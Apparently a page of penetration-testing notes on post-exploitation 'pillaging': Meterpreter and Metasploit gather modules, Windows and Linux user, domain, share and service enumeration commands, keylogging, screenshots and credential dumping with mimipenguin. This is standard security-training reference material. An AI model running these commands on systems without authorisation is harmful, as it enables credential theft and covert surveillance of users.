Data Gathering

Data Harvesting (Pillaging)

Essential information:

  1. System info

  2. Applications

  3. Services

  4. Networks

  5. Documents

  6. Messaging

  7. ...

Meterpreter

Try to identify whether the machine is a server/workstation, and what is their purpose / which department ...

sysinfo
getuid

In Metasploit, there are post exploit enumeration modules:

  1. run post/windows/gather/*

  2. run post/linux/gather/*

Services

run post/windows/gather/enum_services

Also in native cmd we can use WMIC or net start:

wmic service get Caption,StartName,State,pathname
net start

In case of Linux shell, we can do:

service --status-all

Applications

In Meterpreter:

ps

Find DC in Windows

Using cmd:

net view /domain
net group "Domain Controllers" /domain

Using Meterpreter:

run post/windows/gather/enum_domains

Find other hosts

In Meterpreter:

load extapi
adsi_computer_enum <domain>
adsi_user_enum <domain>

Users / Groups

In Windows cmd:

net user
net user /domain
net localgroup
net localgroup administrators

In Linux shell:

cat /etc/passwd

Shares

Windows:

net share

Meterpreter:

run enum_shares

Cheatsheets

Post Exploit Wiki: https://github.com/mubix/post-exploitation-wiki

Windows: https://docs.google.com/document/d/1U10isynOpQtrIK6ChuReu-K1WHTJm4fgG3joiuz43rw/edit?hl=en_US

Linux: https://docs.google.com/document/d/1ObQB6hmVvRPCgPTRZM5NMH034VDM-1N-EWPRz2770K4/edit?hl=en_US

macOS: https://docs.google.com/document/d/10AUm_zUdAQGgoHNo_eS0SO1K-24VVYnulUD2x3rJD3k/edit?hl=en_US

Metasploit: https://docs.google.com/document/d/1ZrDJMQkrp_YbU_9Ni9wMNF2m3nIPEA_kekqqqA2Ywto/edit?pref=2&pli=1

Some other good stuff: http://tim3warri0r.blogspot.com/

Metasploit Scripts

For Windows machines, we may use scraper / winenum.

run winenum
run scraper

Screenshot the client:

screenshot

First attach the Meterpreter process to winlogon.exe or explorer.exe and enable Keylogger:

keyscan_start
keyscan_dump
keyscan_stop

We can also use keylogrecorder.

run keylogrecorder -c 0

Meterpreter - Search

search -d <path> -f <file_pattern>

Meterpreter - Information gathering

run post/windows/gather/credentials/* run post/windows/gather/enum_chrome run post/multi/gather/*

For gathering applications on the host: run post/windows/gather/enum_applications

We can also use Web Browser Pass View to extract credentials saved in web browser

Linux version Mimikatz

  • Require root

  • Dump passwords in memory from:

    • GDM password (Kali / Debian)

    • Gnome Keyring (Ubuntu / ArchLinux Desktop)

    • VSFTPd

    • Apache2

    • OpenSSH

./mimipenguin.sh
python mimipenguin.py

PreviousPersistenceNextExfiltration

Last updated